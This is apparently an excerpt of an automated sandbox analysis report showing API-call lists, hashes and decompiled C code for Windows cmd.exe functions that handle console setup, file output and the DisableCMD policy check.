                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3D8D
                                    • _get_osfhandle.MSVCRT ref: 011E3D99
                                    • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E3DA1
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06D8
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,011F38A5), ref: 011E06E2
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E06EF
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E06F9
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E071E
                                      • Part of subcall function 011E06C0: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E0728
                                      • Part of subcall function 011E06C0: _get_osfhandle.MSVCRT ref: 011E0750
                                      • Part of subcall function 011E06C0: SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011E075A
                                      • Part of subcall function 011E3AAE: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                      • Part of subcall function 011E3AAE: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                      • Part of subcall function 011E3AAE: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                      • Part of subcall function 011E3AAE: memcpy.MSVCRT ref: 011E3AE3
                                      • Part of subcall function 011E3AAE: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                      • Part of subcall function 011E3B2C: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,011E3DBB), ref: 011E3B33
                                      • Part of subcall function 011E3B2C: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011E3DBB), ref: 011E3B3A
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3DC7
                                    • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 011E3E02
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,-00000105,00000000), ref: 011E3E9E
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E3EAF
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,0000020C), ref: 011E3EC0
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3EC7
                                    • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000,00000104), ref: 011E3EDC
                                    • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL), ref: 011E3F07
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,CopyFileExW), ref: 011E3F18
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(IsDebuggerPresent), ref: 011E3F2E
                                    • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(SetConsoleInputExeNameW), ref: 011E3F3F
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E3F5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$HeapMode_get_osfhandle$AddressAllocCriticalProcProcessSection$CommandEnvironmentLineStrings$CtrlEnterFreeHandleHandlerInfoInitializeLeaveModuleOutputTitlememcpy
                                    • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW
                                    • API String ID: 1984466592-3021193919
                                    • Opcode ID: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction ID: 646eff5731a0c69d76884a43f1222fa307c814a17551d9d95fe4b3ba8e390533
                                    • Opcode Fuzzy Hash: 1a02c7b1793679fccdff8a988619d566d4f715dfb039c36e752b51f12e581ea7
                                    • Instruction Fuzzy Hash: 2BA1A231A50701ABDF2DEBE9B81DAAA3BF6FBA4704B04415DE506C7188DF70D981CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 52%
                                    			E011F65A0(WCHAR* __edx, WCHAR* _a4, long _a8, WCHAR* _a12, long _a16, signed int _a20, int _a24, short* _a28, void* _a32, signed int _a36, signed int _a40, WCHAR* _a44, WCHAR* _a48, void* _a52, long _a56, char _a60, intOrPtr _a68, void _a72, void* _a592, char _a596, long _a600, void _a608, void _a610, short _a1128, signed int _a4204) {
                                    				void* _v0;
                                    				intOrPtr _v8;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t137;
                                    				WCHAR* _t150;
                                    				void* _t155;
                                    				long _t157;
                                    				WCHAR* _t160;
                                    				signed int _t161;
                                    				WCHAR* _t164;
                                    				void* _t172;
                                    				long _t174;
                                    				WCHAR* _t175;
                                    				signed int _t176;
                                    				WCHAR* _t178;
                                    				long _t181;
                                    				WCHAR* _t182;
                                    				WCHAR* _t183;
                                    				WCHAR* _t184;
                                    				void* _t190;
                                    				long _t192;
                                    				WCHAR* _t195;
                                    				int _t197;
                                    				void* _t198;
                                    				WCHAR* _t199;
                                    				void* _t202;
                                    				WCHAR* _t206;
                                    				long _t208;
                                    				void* _t212;
                                    				void* _t213;
                                    				void* _t222;
                                    				unsigned int _t226;
                                    				WCHAR* _t228;
                                    				void* _t232;
                                    				unsigned int _t234;
                                    				void* _t235;
                                    				long _t245;
                                    				int _t246;
                                    				WCHAR* _t251;
                                    				WCHAR* _t252;
                                    				signed char* _t254;
                                    				intOrPtr _t257;
                                    				WCHAR* _t258;
                                    				union _LARGE_INTEGER _t263;
                                    				void* _t264;
                                    				void* _t266;
                                    				void* _t267;
                                    				int _t268;
                                    				WCHAR* _t269;
                                    				signed int _t270;
                                    				signed int _t273;
                                    				signed int _t274;
                                    				signed int _t275;
                                    
                                    				_t253 = __edx;
                                    				_t274 = _t273 & 0xfffffff8;
                                    				E011E8290(0x1074);
                                    				_t137 =  *0x11fd0b4; // 0x2833377e
                                    				_a4204 = _t137 ^ _t274;
                                    				_a56 = _a56 | 0xffffffff;
                                    				_t262 = _a4;
                                    				_a600 = 0x104;
                                    				_a48 = _a4;
                                    				_t266 = 0;
                                    				_a52 = 0;
                                    				_t212 = 1;
                                    				_a20 = 0;
                                    				_a60 = 0x7fffffff;
                                    				_a32 = 0;
                                    				_a36 = 0;
                                    				_a40 = 1;
                                    				_a592 = 0;
                                    				_a596 = 1;
                                    				memset( &_a72, 0, 0x104);
                                    				_t275 = _t274 + 0xc;
                                    				if(E011E0C70( &_a72, ((0 | _a596 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    					_t253 = 0;
                                    					_t263 = E011DD120(_t262, 0,  &_a72);
                                    					__eflags = _t263 - 0xffffffff;
                                    					if(_t263 != 0xffffffff) {
                                    						L13:
                                    						_a28 =  &_a608;
                                    						_t150 = E011E0178( &_a608);
                                    						__eflags = _t150;
                                    						if(_t150 == 0) {
                                    							_t202 =  &_a60;
                                    							__imp___get_osfhandle(_t202);
                                    							_a56 = GetFileSize(_t202, _t263);
                                    							__imp___get_osfhandle(0);
                                    							SetFilePointer(0, _t263, 0, 0);
                                    							_t30 =  &_a36;
                                    							 *_t30 = _a36 & _t266;
                                    							__eflags =  *_t30;
                                    							_a32 = _t212;
                                    						}
                                    						while(1) {
                                    							L15:
                                    							__eflags =  *0x11fd544;
                                    							if( *0x11fd544 != 0) {
                                    								break;
                                    							}
                                    							_t155 =  &_a608;
                                    							__imp___get_osfhandle(_t155, 0x200,  &_a4, 0);
                                    							_t222 = _t263;
                                    							_t156 = ReadFile(_t155, ??, ??, ??, ??);
                                    							__eflags = _t156;
                                    							if(_t156 == 0) {
                                    								L81:
                                    								_t157 = GetLastError();
                                    								_push(0);
                                    								_push(_t157);
                                    								 *0x1213cf0 = _t157;
                                    								E011DC5A2(_t222);
                                    								L82:
                                    								E011DDB92(_t263);
                                    								_t212 = 0;
                                    								goto L87;
                                    							}
                                    							_t226 = _a4;
                                    							__eflags = _t226;
                                    							if(_t226 == 0) {
                                    								goto L82;
                                    							}
                                    							__eflags = _a40;
                                    							if(_a40 == 0) {
                                    								L21:
                                    								_a24 = _t226;
                                    								__eflags = _t266;
                                    								if(_t266 == 0) {
                                    									L25:
                                    									_t160 = E011E269C(_t156);
                                    									__eflags = _t160;
                                    									if(_t160 != 0) {
                                    										L28:
                                    										_t268 = _a4;
                                    										_t254 =  &_a608;
                                    										_t228 = _t268;
                                    										__eflags = _t268;
                                    										while(1) {
                                    											_a12 = _t228;
                                    											if(__eflags == 0) {
                                    												break;
                                    											}
                                    											_t161 =  *_t254 & 0x000000ff;
                                    											__eflags =  *((char*)(_t161 + 0x1217f30));
                                    											if( *((char*)(_t161 + 0x1217f30)) == 0) {
                                    												L31:
                                    												_t254 =  &(_t254[1]);
                                    												_t228 = _t228 - 1;
                                    												__eflags = _t228;
                                    												continue;
                                    											}
                                    											_t253 =  &(_t254[1]);
                                    											_t228 = _t228 - 1;
                                    											__eflags = _t228;
                                    											_a12 = _t228;
                                    											if(_t228 == 0) {
                                    												_t198 =  &_a12;
                                    												__imp___get_osfhandle(_t253, _t212, _t198, 0);
                                    												_t222 = _t263;
                                    												_t199 = ReadFile(_t198, ??, ??, ??, ??);
                                    												__eflags = _t199;
                                    												if(_t199 == 0) {
                                    													goto L81;
                                    												}
                                    												_t268 =  &(_a4[0]);
                                    												__eflags = _t268;
                                    												_a4 = _t268;
                                    												_a24 = _t268;
                                    												L36:
                                    												_a28 = _a28 & 0x00000000;
                                    												_t253 =  &_a608;
                                    												_t164 = E011F6CEF(_t212,  &_a608,  &_a24,  &_a28);
                                    												__eflags = _t164;
                                    												if(_t164 != 0) {
                                    													L39:
                                    													_t269 = MultiByteToWideChar( *0x1203854, 0,  &_a608, _t268,  &_a1128, 0x400);
                                    													_a12 = _t269;
                                    													__eflags = _t269;
                                    													if(_t269 == 0) {
                                    														_t269 = 0x400;
                                    														_a12 = 0x400;
                                    													}
                                    													_t226 = _a4;
                                    													_a28 =  &_a1128;
                                    													L42:
                                    													__eflags = _a40;
                                    													if(_a40 != 0) {
                                    														__eflags =  *0x1213cd0;
                                    														if( *0x1213cd0 != 0) {
                                    															E011DC5A2(_t226, 0x2354, _t212, _a48);
                                    															_t226 = _a4;
                                    															_t275 = _t275 + 0xc;
                                    															_t269 = _a12;
                                    														}
                                    														_t75 =  &_a40;
                                    														 *_t75 = _a40 & 0x00000000;
                                    														__eflags =  *_t75;
                                    													}
                                    													_v0 = _a28;
                                    													__eflags = _t269;
                                    													if(_t269 <= 0) {
                                    														L74:
                                    														_t270 = _a32;
                                    														_t253 = _a36;
                                    														__eflags = _t270 | _t253;
                                    														if((_t270 | _t253) != 0) {
                                    															_t172 =  &_a32;
                                    															__imp___get_osfhandle(_t172, _t212);
                                    															SetFilePointerEx(_t172, _t263, 0, 0);
                                    															_t253 = _a36;
                                    															_t270 = _a32;
                                    															_t226 = _a4;
                                    														}
                                    														__eflags = _t226 - _a24;
                                    														if(_t226 != _a24) {
                                    															goto L82;
                                    														} else {
                                    															__eflags = _a60 - _t253;
                                    															if(__eflags < 0) {
                                    																goto L82;
                                    															}
                                    															if(__eflags > 0) {
                                    																L80:
                                    																_t266 = _a20;
                                    																goto L15;
                                    															}
                                    															__eflags = _a56 - _t270;
                                    															if(_a56 <= _t270) {
                                    																goto L82;
                                    															}
                                    															goto L80;
                                    														}
                                    													} else {
                                    														do {
                                    															_t174 = 0x50;
                                    															__eflags = _t269 - _t174;
                                    															if(_t269 <= _t174) {
                                    																_a8 = _t269;
                                    																__eflags = _t269;
                                    																if(_t269 == 0) {
                                    																	break;
                                    																}
                                    																L50:
                                    																__eflags =  *0x11fd544;
                                    																if( *0x11fd544 != 0) {
                                    																	goto L86;
                                    																}
                                    																_t175 = E011E269C(_t174);
                                    																__eflags = _t175;
                                    																if(_t175 == 0) {
                                    																	__eflags =  *0x121805c;
                                    																	if( *0x121805c != 0) {
                                    																		__eflags = _a20;
                                    																		if(_a20 == 0) {
                                    																			_t176 = _a8;
                                    																			_t232 = _v0;
                                    																			L62:
                                    																			_a68 = _t176 + _t176;
                                    																			_t178 = E011E27C8(_t176 + _t176, _t232, _t176 + _t176,  &_a16);
                                    																			__eflags = _a12;
                                    																			_t257 = _v8;
                                    																			_a36 = _t178;
                                    																			if(_a12 != 0) {
                                    																				 *((short*)(_a68 + _t257)) = _a52;
                                    																			}
                                    																			_t234 = _a16;
                                    																			_t269 = _t269 - (_t234 >> 1);
                                    																			_t181 = _a8;
                                    																			_t258 = _t257 + _t234;
                                    																			__eflags = _t258;
                                    																			_v0 = _t258;
                                    																			L65:
                                    																			_t253 = _a44;
                                    																			L66:
                                    																			__eflags = _t253;
                                    																			if(_t253 == 0) {
                                    																				L68:
                                    																				_t182 = GetLastError();
                                    																				 *0x1213cf0 = _t182;
                                    																				__eflags = _t182;
                                    																				if(_t182 == 0) {
                                    																					 *0x1213cf0 = 0x70;
                                    																				}
                                    																				_t235 = _t212;
                                    																				_t183 = E011E0178(_t182);
                                    																				__eflags = _t183;
                                    																				if(_t183 == 0) {
                                    																					_t236 = _t212;
                                    																					_t184 = E011F9953(_t183, _t212);
                                    																					__eflags = _t184;
                                    																					if(_t184 == 0) {
                                    																						E011F985A( *0x1213cf0);
                                    																					} else {
                                    																						_push(0);
                                    																						_push(0x2364);
                                    																						E011DC5A2(_t236);
                                    																					}
                                    																					goto L86;
                                    																				} else {
                                    																					_push(0);
                                    																					_push(0x1d);
                                    																					E011DC5A2(_t235);
                                    																					goto L72;
                                    																				}
                                    																			}
                                    																			__eflags = _t234 - _t181 + _t181;
                                    																			if(_t234 == _t181 + _t181) {
                                    																				goto L72;
                                    																			}
                                    																			goto L68;
                                    																		}
                                    																		L60:
                                    																		_t176 = _a8;
                                    																		_t232 = _v0;
                                    																		_a52 =  *(_t232 + _t176 * 2) & 0x0000ffff;
                                    																		 *(_t232 + _t176 * 2) = 0;
                                    																		goto L62;
                                    																	}
                                    																	__eflags = _a20;
                                    																	if(_a20 != 0) {
                                    																		goto L60;
                                    																	}
                                    																	_t190 = _a8;
                                    																	L58:
                                    																	__imp___get_osfhandle(0);
                                    																	_t253 = WriteFile(_t190, _t212, _v0, _t190,  &_a16);
                                    																	_t192 = _a16;
                                    																	_t269 = _t269 - _t192;
                                    																	_v0 = _v0 + _t192;
                                    																	_t234 = _t192 + _t192;
                                    																	_t181 = _a8;
                                    																	_a16 = _t234;
                                    																	goto L66;
                                    																}
                                    																_t195 = WriteConsoleW(GetStdHandle(0xfffffff5), _v0, _a8,  &_a16, 0);
                                    																_a44 = _t195;
                                    																__eflags = _t195;
                                    																_t190 = _a8;
                                    																if(_t195 == 0) {
                                    																	goto L58;
                                    																}
                                    																_t245 = _a16;
                                    																__eflags = _t245 - _t190;
                                    																if(_t245 != _t190) {
                                    																	goto L58;
                                    																}
                                    																_t269 = _t269 - _t245;
                                    																_t234 = _t245 + _t245;
                                    																_v0 = _v0 + _t234;
                                    																_a16 = _t234;
                                    																goto L65;
                                    															}
                                    															_a8 = _t174;
                                    															goto L50;
                                    															L72:
                                    															__eflags = _t269;
                                    														} while (_t269 > 0);
                                    														_t226 = _a4;
                                    														goto L74;
                                    													}
                                    												}
                                    												_t197 = _a24;
                                    												__eflags = _t197;
                                    												if(_t197 == 0) {
                                    													goto L82;
                                    												}
                                    												_t268 = _t197;
                                    												goto L39;
                                    											}
                                    											goto L31;
                                    										}
                                    										goto L36;
                                    									}
                                    									__eflags =  *0x121805c - _t160;
                                    									if( *0x121805c != _t160) {
                                    										goto L28;
                                    									}
                                    									_t226 = _a4;
                                    									_t269 = _t226;
                                    									L23:
                                    									_a12 = _t269;
                                    									goto L42;
                                    								}
                                    								_t269 = _t226 >> 1;
                                    								__eflags = _t269;
                                    								goto L23;
                                    							}
                                    							_t156 = 0xfeff;
                                    							__eflags = _a608 - 0xfeff;
                                    							if(_a608 != 0xfeff) {
                                    								_t45 =  &_a20;
                                    								 *_t45 = _a20 & 0x00000000;
                                    								__eflags =  *_t45;
                                    								_a24 = _t226;
                                    								goto L25;
                                    							}
                                    							_t246 = _t226 - 2;
                                    							__eflags = _t246;
                                    							_a4 = _t246;
                                    							_t266 = _t212;
                                    							_a20 = _t266;
                                    							_t156 = memmove( &_a608,  &_a610, _t246);
                                    							_t226 = _a4;
                                    							_t275 = _t275 + 0xc;
                                    							goto L21;
                                    						}
                                    						L86:
                                    						E011DDB92(_t263);
                                    						goto L87;
                                    					}
                                    					_t206 = E011E3320(L"DPATH");
                                    					__eflags = _t206;
                                    					if(_t206 == 0) {
                                    						L11:
                                    						_t250 =  *0x1213cf0;
                                    						__eflags =  *0x1213cf0 - 0x7b;
                                    						if( *0x1213cf0 == 0x7b) {
                                    							_t250 = 2;
                                    							 *0x1213cf0 = _t250;
                                    						}
                                    						goto L2;
                                    					}
                                    					_t251 = _a592;
                                    					__eflags = _t251;
                                    					if(_t251 == 0) {
                                    						_t251 =  &_a72;
                                    					}
                                    					_t208 = SearchPathW(_t206, _a48, 0, _a600, _t251, 0);
                                    					__eflags = _t208;
                                    					if(_t208 == 0) {
                                    						goto L11;
                                    					}
                                    					_t252 = _a592;
                                    					__eflags = _t252;
                                    					if(_t252 == 0) {
                                    						_t252 =  &_a72;
                                    					}
                                    					_t253 = 0;
                                    					_t263 = E011DD120(_t252, 0, _t252);
                                    					__eflags = _t263 - 0xffffffff;
                                    					if(_t263 != 0xffffffff) {
                                    						goto L13;
                                    					} else {
                                    						goto L11;
                                    					}
                                    				} else {
                                    					_t250 = 8;
                                    					L2:
                                    					E011F985A(_t250);
                                    					L87:
                                    					__imp__??_V@YAXPAX@Z(_a592);
                                    					_pop(_t264);
                                    					_pop(_t267);
                                    					_pop(_t213);
                                    					return E011E6FD0(_t212, _t213, _a4204 ^ _t275, _t253, _t264, _t267);
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011F6613
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 011F668C
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011F6B01
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • _get_osfhandle.MSVCRT ref: 011F66E9
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F66F1
                                    • _get_osfhandle.MSVCRT ref: 011F6701
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6709
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011F6739
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 011F6741
                                    • memmove.MSVCRT ref: 011F678F
                                    • _get_osfhandle.MSVCRT ref: 011F6812
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F681A
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 011F6882
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 011F692B
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 011F6932
                                    • _get_osfhandle.MSVCRT ref: 011F697E
                                    • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6986
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 011F6A1E
                                    • _get_osfhandle.MSVCRT ref: 011F6A76
                                    • SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F6A7E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F6AAD
                                      • Part of subcall function 011F9953: _get_osfhandle.MSVCRT ref: 011F9956
                                      • Part of subcall function 011F9953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011F995E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
                                    • String ID: DPATH
                                    • API String ID: 1247154890-2010427443
                                    • Opcode ID: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction ID: 13f2b848f647374717876c164d168e2c41af6bb4fe1aa5d519398cf27b700200
                                    • Opcode Fuzzy Hash: 1d0f6e0e6f47bf7cf1a632663d13191709d094bbcbd0298914dc1264654f4730
                                    • Instruction Fuzzy Hash: F8F1B271608342DFDB28DF29D848B6BBBE4FB98714F044A2DF68597284EB70D844CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 69%
                                    			E011E44FC() {
                                    				signed int _v8;
                                    				char _v24;
                                    				int* _v28;
                                    				char _v29;
                                    				char _v36;
                                    				void* _v40;
                                    				int* _v44;
                                    				int _v48;
                                    				int _v52;
                                    				signed int _t26;
                                    				void* _t39;
                                    				intOrPtr _t44;
                                    				intOrPtr _t48;
                                    				intOrPtr _t51;
                                    				int _t53;
                                    				intOrPtr _t55;
                                    				int _t59;
                                    				int _t64;
                                    				void* _t73;
                                    				void* _t75;
                                    				intOrPtr _t82;
                                    				void* _t84;
                                    				void* _t95;
                                    				char* _t96;
                                    				signed int _t97;
                                    				signed int _t98;
                                    
                                    				_t26 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t26 ^ _t98;
                                    				_v44 = 0;
                                    				 *0x120b938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
                                    				E011E465D(_t75);
                                    				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
                                    				_v36 = 0;
                                    				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
                                    					_v48 = 4;
                                    					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
                                    					RegCloseKey(_v40);
                                    				}
                                    				 *0x11fd614 = 1;
                                    				_t93 = 0x11fd600;
                                    				 *0x11fd610 =  &_v29;
                                    				_t39 = E011E4719(0x11fd600);
                                    				asm("sbb al, al");
                                    				 *0x11fd614 =  *0x11fd614 &  ~(_t39 - 1);
                                    				E011E46D8();
                                    				_v28 = 0;
                                    				_t96 =  &_v24;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_t44 = E011E3D27(0,  &_v24);
                                    				if(_v36 == 1) {
                                    					_push(0);
                                    					_push(0x40002729);
                                    					E011DC108( &_v24);
                                    					E011F3BB0(__eflags, 0);
                                    					do {
                                    						__eflags = E011E4B60(__eflags, 0);
                                    					} while (__eflags == 0);
                                    					_push(0xff);
                                    					goto L13;
                                    				} else {
                                    					_t96 = 0xff;
                                    					if(_t44 == 0) {
                                    						L29:
                                    						_push(0);
                                    						L011E82C1();
                                    						_v28 = _t44;
                                    						_t84 = 0x120b8b8;
                                    						_t97 = 2;
                                    						__eflags = _t44;
                                    						if(_t44 == 0) {
                                    							L33:
                                    							__eflags = _v36 - _t97;
                                    							if(_v36 != _t97) {
                                    								_t55 = E011E0178(_t44);
                                    								__eflags = _t55;
                                    								if(_t55 == 0) {
                                    									_t97 = 3;
                                    									__imp___setmode(0x8000);
                                    									0 = 0;
                                    								}
                                    								E011DB2B0(0, 0);
                                    								while(1) {
                                    									L40:
                                    									 *0x11fd590 = 0;
                                    									EnterCriticalSection( *0x1203858);
                                    									 *0x11fd544 = 0;
                                    									LeaveCriticalSection( *0x1203858);
                                    									_t93 = 0;
                                    									_t86 = _t97;
                                    									_t96 = E011DEEF0(_t97, 0, 0);
                                    									__eflags = _t96 - 1;
                                    									if(_t96 == 1) {
                                    										continue;
                                    									}
                                    									L41:
                                    									__eflags = _t96 - 0xffffffff;
                                    									if(__eflags == 0) {
                                    										do {
                                    											__eflags = E011E4B60(__eflags, 0);
                                    										} while (__eflags == 0);
                                    										L25:
                                    										_push(0);
                                    										L13:
                                    										exit();
                                    										L14:
                                    										_t48 = E011DEEF0(1, _t93,  *0x1213cd8);
                                    										if(_t48 == 1) {
                                    											do {
                                    												__eflags = E011E4B60(__eflags, 0);
                                    											} while (__eflags == 0);
                                    											_push(1);
                                    											goto L13;
                                    										}
                                    										if(_t48 == 0xffffffff) {
                                    											do {
                                    												__eflags = E011E4B60(__eflags, 0);
                                    											} while (__eflags == 0);
                                    											goto L25;
                                    										}
                                    										_t93 = _t48;
                                    										_t51 = E011E0E00(0, _t48);
                                    										if(_t51 != 0) {
                                    											_v28 = _t51;
                                    										}
                                    										L8:
                                    										_t97 = _t97 + 1;
                                    										if(_t97 < 3) {
                                    											L7:
                                    											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
                                    											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
                                    												goto L14;
                                    											}
                                    											goto L8;
                                    										}
                                    										E011E06C0(0);
                                    										_t53 = GetConsoleOutputCP();
                                    										 *0x1203854 = _t53;
                                    										GetCPInfo(_t53, 0x1203840);
                                    										_t44 = E011E465D(0);
                                    										_t82 =  *0x1213ccc;
                                    										L10:
                                    										_t106 = _t82;
                                    										if(_t82 == 0) {
                                    											 *0x1218058 = 0;
                                    											goto L29;
                                    										} else {
                                    											goto L11;
                                    										}
                                    										do {
                                    											L11:
                                    										} while (E011E4B60(_t106, 0) == 0);
                                    										_push(_v28);
                                    										goto L13;
                                    									}
                                    									EnterCriticalSection( *0x1203858);
                                    									 *0x11fd544 = 0;
                                    									LeaveCriticalSection( *0x1203858);
                                    									_t59 = GetConsoleOutputCP();
                                    									 *0x1203854 = _t59;
                                    									GetCPInfo(_t59, 0x1203840);
                                    									E011E465D(_t86);
                                    									E011E0E00(0, _t96);
                                    									 *0x11fd59c = 0;
                                    									E011E06C0(0);
                                    									_t64 = GetConsoleOutputCP();
                                    									 *0x1203854 = _t64;
                                    									GetCPInfo(_t64, 0x1203840);
                                    									E011E465D(0);
                                    									do {
                                    										goto L40;
                                    									} while (_t96 == 1);
                                    									goto L41;
                                    									L40:
                                    									 *0x11fd590 = 0;
                                    									EnterCriticalSection( *0x1203858);
                                    									 *0x11fd544 = 0;
                                    									LeaveCriticalSection( *0x1203858);
                                    									_t93 = 0;
                                    									_t86 = _t97;
                                    									_t96 = E011DEEF0(_t97, 0, 0);
                                    									__eflags = _t96 - 1;
                                    								}
                                    							}
                                    							_push(0);
                                    							_push(0x40002729);
                                    							E011DC108(_t84);
                                    							E011F3BB0(__eflags, 0);
                                    							do {
                                    								__eflags = E011E4B60(__eflags, 0);
                                    							} while (__eflags == 0);
                                    							_push(_t96);
                                    							goto L13;
                                    						}
                                    						__eflags = _t44 - _t97;
                                    						if(__eflags != 0) {
                                    							goto L33;
                                    						} else {
                                    							goto L31;
                                    						}
                                    						do {
                                    							L31:
                                    							__eflags = E011E4B60(__eflags, 0);
                                    						} while (__eflags == 0);
                                    						goto L25;
                                    					}
                                    					_push(0);
                                    					_push(0x120b8b8);
                                    					L011E82C1();
